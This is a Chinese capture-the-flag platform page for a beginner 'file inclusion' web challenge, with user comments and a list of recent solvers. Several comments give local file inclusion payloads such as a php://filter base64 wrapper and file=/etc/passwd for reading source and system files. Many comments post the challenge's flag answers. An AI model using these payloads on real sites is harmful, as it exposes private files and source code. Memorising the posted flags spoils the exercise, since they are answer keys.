文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 11658
提  示:
描  述:
flag{}
评论
fonddream 1年前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

大哥大 1年前

http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.

回复 2

nicchanggh 1年前

flag{e92c0ec08be5fc7e0bd706e697e366fd}

回复 0

chushou 1年前

flag{ebfea7aca0bd16bb5819c678090ff026}

回复 0

107zsm 1年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 11

小夫 1年前

file=/flag

回复 0

rightstar 1年前

flag{a1ad1a8522261e6b9abf21e9bd6ef675}

回复 0

sibeil 1年前

flag{b23328bbf165641292d9871be279459a}

回复 0

wxy1343 1年前

flag{a15320afe0f7ad00fb16135d7456a9e1}

回复 0

mircle 2年前

flag{4911bd2afb90b2abf40a02b45e6979ac}

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

SX9 攻破了该题 16小时前
Irene 攻破了该题 1天前
纯情内向小学生 攻破了该题 1天前
123^% 攻破了该题 2天前
ovdoes 攻破了该题 2天前
13097932959 攻破了该题 2天前
藕藕藕是木薯 攻破了该题 2天前
笨蛋奶妈 攻破了该题 2天前
XHtzl99 攻破了该题 2天前
Noctis 攻破了该题 2天前
Miki2 攻破了该题 2天前
汤圆儿安 攻破了该题 3天前
keduolim 攻破了该题 3天前
灵梦归希 攻破了该题 4天前
1163064874 攻破了该题 4天前
kl01 攻破了该题 4天前
1393385937 攻破了该题 4天前
BVzero 攻破了该题 4天前
19137537912 攻破了该题 5天前
llc123 攻破了该题 5天前
问题反馈